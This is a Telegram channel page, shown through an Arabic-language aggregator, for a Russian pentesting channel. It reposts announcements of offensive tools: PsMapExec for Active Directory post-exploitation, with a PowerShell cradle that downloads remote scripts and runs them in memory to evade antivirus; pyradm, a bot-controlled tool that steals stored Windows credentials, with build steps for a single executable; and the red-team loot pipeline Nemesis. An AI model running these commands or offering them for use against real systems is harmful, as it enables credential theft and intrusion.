ar
Feedback

لا تقع ضحية للمخادعين! تيليمتريو يكتشف ويُميّز هذه القنوات 👉 إذا كنت تريد رؤية العلامة، اشترك 👈

Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

إظهار المزيد
2 062
المشتركون
لا توجد بيانات24 ساعات
+27 أيام
-930 أيام
أرشيف المشاركات
Repost from Memes 365
Опер

Хочу также посоветовать: 1 - Проверить себя на утечки! 💧 2 - Наш discord сервер! Где можно пообщаться 👾 3 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

Repost from Pentest HaT
🔄 💻 PsMapExec v0.5.2 Утилита для пост эксплуатации 💻 Active Directory окружения написанная на PowerShell. Вдохновлена Crac
🔄 💻 PsMapExec v0.5.2 Утилита для пост эксплуатации 💻 Active Directory окружения написанная на PowerShell. Вдохновлена CrackMapExec Текущая поддержка методов (протоколов): 🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Current user
PsMapExec -Targets All -Method [Method]

# With Password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# With Hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# With Ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec -Targets All -Method WMI -LocalAuth
💻 Github ▪️ Documentation #soft #pentest #powershell #psmapexec ✈️ // Pentest HaT 🎩

sticker.webp0.17 KB

Что вам интересно?🤔
Anonymous voting

Repost from Pentest HaT
🔄🔮 pyradm v0.4 Добавил возможность восстановления забытых 😇 👍 паролей в 🟦 Windows 🎃 Собирает с множества источников: Бр
🔄🔮 pyradm v0.4 Добавил возможность восстановления забытых 😇 👍 паролей в 🟦 Windows 🎃 Собирает с множества источников:
Браузеры
БД
Outlook
Thunderbird
Apache Directory Studio
CoreFTP
CyberDuck
FileZilla
FileZilla Server
FTPNavigator
OpenSSH
OpenVPN
KeePass Configuration Files (KeePass1, KeePass2)
PuttyCM
Rclone
RDPManager
VNC
WinSCP
Windows Subsystem for Linux
Autologon
MSCache
Credential Files
Credman
DPAPI Hash
Hashdump (LM/NT)
LSA secret
Vault Files
Команда: /winpass 🔠 Установка: git clone https://github.com/akhomlyuk/pyradm.git cd pyradm pip3 install -r requirements.txt Put bot token to cfg.py, ask @Bothfather python3 main.py Компиляция под 💻 Windows в 1 файл Put bot token to cfg.py pip install nuitka nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py 💻 Home 💻 LaZagne #pyradm #python #soft #bot ✈️ // Pentest HaT 🎩

Repost from PurpleBear
Nemesis - offensive data enrichment pipeline and operator support system На Red Teaming проектах приходится анализировать большое количество неструктурированных данных, полученных в ходе работ и использования различных инструментов.😎 Обычно эта аналитика сводилась к загрузке лута и логов в Hive с небольшими заметками и гипотезами как можно использовать полученную информацию в ходе дальнейшего развития атак. Поэтому мне всегда хотелось использовать подходы к аналитике аля Big Data, чтобы иметь под рукой всю доступную информацию проиндексированную для быстрого поиска в режиме реального времени. Крутые ребята - @tifkin_, @harmj0y, @Max_Harley, @themightyshiv из SpecterOps создали Nemesis - инструмент позволяющий успешно решать подобные задачи: ✅ Извлекать метаданные (file types, hashes) всех загруженных файлов ✅ Структурировать данные полученные из различных источников (GPP files, web.config files, PE files) ✅ Анализировать лут в виде найденных .NET assemblies с помощью кастомной версии InspectAssembly, в целях пост эксплуатации и повышения привилегий ✅ Извлекать и индексировать метаданные и содержание офисных документов, конвертить в pdf в изолированной среде для ручного анализа (привет CanaryTokens) c помощью Gotenberg ✅ DPAPI лут (History/Downloads, Cookies, Logins, Local State files from Chromium browsers) для последующей расшифровки при наличии DPAPI masterkey ✅ Автоматизированный перебор паролей для зашифрованных файлов (PDFs, office documents, zips/7zs) с помощью John-the-Ripper ✅ Nemesis API для автоматизации, C2 Connectors для интеграции с другими инструментами, функциональность аlert'ов и многое другое Я уже в течение нескольких месяцев тестирую возможности этого фреймворка в лабораторной среде. Мнение на данном этапе - 🔥 впечатляющие возможности, продуманный дизайн архитектуры (схема простая - объясняю один раз на скрине), CLI/Web UI, RAGnarok - LLM чат бот для удобного поиска по индексам и многое-многое другое. Лайк, если интересен лонгрид с картинками про возможности и опыт использования Nemesis.

Repost from PurpleBear
photo content

sticker.webp0.25 KB